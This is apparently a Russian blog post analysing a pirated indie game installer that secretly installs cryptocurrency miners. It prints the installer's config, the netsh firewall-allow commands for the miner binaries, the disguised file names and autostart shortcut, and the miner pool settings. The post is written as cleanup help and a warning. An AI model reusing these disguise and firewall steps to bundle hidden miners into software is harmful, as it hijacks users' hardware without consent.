Майнеры в нагрузку или как заработать на хомячках
Invite pending
Один мой знакомый(с), просматривая торренты на предмет чем бы скоротать вечер, наткнулся на маленькую индии-игру. Судя по видео гейплея игра честно тянула на свои 42 мегабайта, так что была без раздумий скачана.
Во время установки неожиданно выскочило предупреждение Windows о том, что процесс C:\Windows\mssct.exe запрашивает разрешение на использование Mining Stratum Protocol, и тут же закрашился драйвер видеокарты.
Думаю, все уже догадались, но давайте посмотрим, что же там внутри.
Universal Extractor, как это ни странно распаковать файл не смог, показав лишь информацию PeID, о том, что файл создан компилятором Дельфи. Долго не думая, глянем на HEX и вуаля
Smart Install Maker v. 5.03. Немного гугления и sim_unpacker.exe выдает нам 3 файлика data.cab, installer.config и runtime.cab весом 1кб, который не открывается.Посмотрев конфиг инсталлятора можно заметить, что в реестр он ничего плохого не пишет, кроме стандартных привязок деинсталлятора. Запускается зловред с "@$&%14\Adobe Reader 11.lnk" (абракадабра заменяется на папку Автозагрузки). Так же фаерволу разрешается пропускать трафик от следующих приложений, которые автоматически ставятся в систему (хотя в моем случае это не сработало и винда, версии 8.1 ругнулась. Проверял дома – там все прошло без вопросов, но там SSD и, видимо, правила успели примениться):
netsh advfirewall firewall add rule name="My Application" dir=in action=allow program="C:\Windows\mssct.exe" enable=yes
netsh advfirewall firewall add rule name="My Application2" dir=in action=allow program="C:\Windows\mscst.exe" enable=yes
netsh advfirewall firewall add rule name="My Application3" dir=in action=allow program="C:\Windows\dwm.exe" enable=yes
Для тех, кому такую систему придется чистить – под спойлером запрятал часть конфига, которая может пригодится.
И список файлов, которые распаковываются в систему, хотя достаточно удалить ярлык из автозагрузки.
Посмотреть
Smart Install Maker v. 5.03 0 0 1 16744576 0 0 0 Установка Creeper_World_2 1.4 Copyright © 2013, Knuckle Cracke -37 Tahoma 16777215 1 2 0 16777215 1 -11 Tahoma 0 setup-@$&%19.bin 0 54053711 0 0 1 Copyright © 2013, Knuckle Cracke Creeper_World_2 0 0 0 -1 1 0 0 http:// 1 0 5 0 0 1 0 1 52897 0 5 1 0 Creeper_World_2 0 Creeper_World_2 1.4 1 99 @$&%01\Knuckle Cracke\Creeper_World_2 0 13533795 62 Windows XP/2003 Server/Vista/2008 Server/7. 0 0 Установка %Creeper World 3% %v1.4% 1 23 0 171 16777215 1 8 178 http:// Удаление Creeper_World_2 1.4 0 0 26 0 5 20 0 0 0 0 0 0 0 0 0 @$&%04\Uninstall.exe @$&%04\Uninstall.ini 0 0 8388608 0 Creeper_World_2 0 0 0 0 0 0 Creeper_World_2 1 Creeper_World_2 1.4 0 1 0 1 1 1 1 1 1 1 5 1729820 0 0 2 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Creeper_World_2 1.4 DisplayName Creeper_World_2 1.4 0 1 1 2 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Creeper_World_2 1.4 DisplayIcon @$&%04\Uninstall.exe 0 1 1 2 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Creeper_World_2 1.4 UninstallString @$&%04\Uninstall.exe 0 1 1 2 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Creeper_World_2 1.4 NoModify 1 2 1 1 2 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Creeper_World_2 1.4 NoRepair 1 2 1 1 @$&%14\Adobe Reader 11.lnk 2 0 @$&%02\bitcoin-reaper.cl 2 0 @$&%02\bitcoin.conf 2 0 @$&%02\conhost.exe 2 0 @$&%02\cudart32_50_35.dll 2 0 @$&%02\curl.dll 2 0 @$&%02\dwm.exe 2 0 @$&%02\litecoin-reaper.cl 2 0 @$&%02\litecoin.conf 2 0 @$&%02\msvcp100.dll 2 0 @$&%02\msvcr100.dll 2 0 @$&%02\OpenCL.dll 2 0 @$&%02\pthread.dll 2 0 @$&%02\pthreadVC2.dll 2 0 @$&%02\reaper.conf 2 0 @$&%02\reaper_hd4xxx.cl 2 0 @$&%02\reaper_nvidia.cl 2 0 @$&%02\solidcoin-reaper.cl 2 0 @$&%02\solidcoin.conf 2 0 @$&%02\mscst.exe 2 0 @$&%02\mssct.exe 2 0 @$&%05\CreeperWorld2-0363.exe 2 0 @$&%04\Uninstall.exe 2 1 1 netsh advfirewall firewall add rule name=«My Application» dir=in action=allow program=«C:\Windows\mssct.exe» enable=yes 0 0 0 1 netsh advfirewall firewall add rule name=«My Application2» dir=in action=allow program=«C:\Windows\mscst.exe» enable=yes 0 0 0 1 netsh advfirewall firewall add rule name=«My Application3» dir=in action=allow program=«C:\Windows\dwm.exe» enable=yes 0 0 0 0 @$&%02\conhost.exe 1 1 0 0 @$&%05\CreeperWorld2-0363.exe 1 1 0 Russian (Русский) 1049 Вас приветствует Мастер установки Creeper_World_2 Эта программа установит Creeper_World_2 на ваш компьютер.
Из интересного:
Bincoin.conf
host mining.eligius.st
port 8337
user 1vyxXG9S58bsfTe7uPq9XSxjUYws1EX86
pass paske
protocol bitcoin
worksize 128
aggression 1
threads_per_gpu 1
vectors 2
port 8337
user 1vyxXG9S58bsfTe7uPq9XSxjUYws1EX86
pass paske
protocol bitcoin
worksize 128
aggression 1
threads_per_gpu 1
vectors 2
Litecoin.conf
host 127.0.0.1
port 8332
user SuperStars.1
pass x
protocol litecoin
gpu_thread_concurrency 6144
worksize 256
vectors 1
aggression 18
threads_per_gpu 1
sharethreads 32
lookup_gap 2
port 8332
user SuperStars.1
pass x
protocol litecoin
gpu_thread_concurrency 6144
worksize 256
vectors 1
aggression 18
threads_per_gpu 1
sharethreads 32
lookup_gap 2
SolidCoin.conf
host localhost
port 12300
user user
pass pass
protocol solidcoin
worksize 64
aggression 1
threads_per_gpu 1
cpu_mining_threads 0
platform 0
cpu_algorithm vector3
gpu_sharemask 0x80FFFF
long_polling yes
sharethreads 1
port 12300
user user
pass pass
protocol solidcoin
worksize 64
aggression 1
threads_per_gpu 1
cpu_mining_threads 0
platform 0
cpu_algorithm vector3
gpu_sharemask 0x80FFFF
long_polling yes
sharethreads 1
Выводы:
— покупайте лицензионные игры;
— в связи с ростом популярности криптовалют, готовьтесь к наплыву более изощренных и незаметных установщиков в очередном «Battlefield 2020 скачать без СМС бесплатно»;
— информируйте своих хомячков.
Спасибо за внимание.
P.S. Ошибки и опечатки прошу сообщать в личку.
P.P.S. Игру оно все-таки ставит. Хотя в распакованных данных я её не нашел, и кажется, что идет установка через интернет.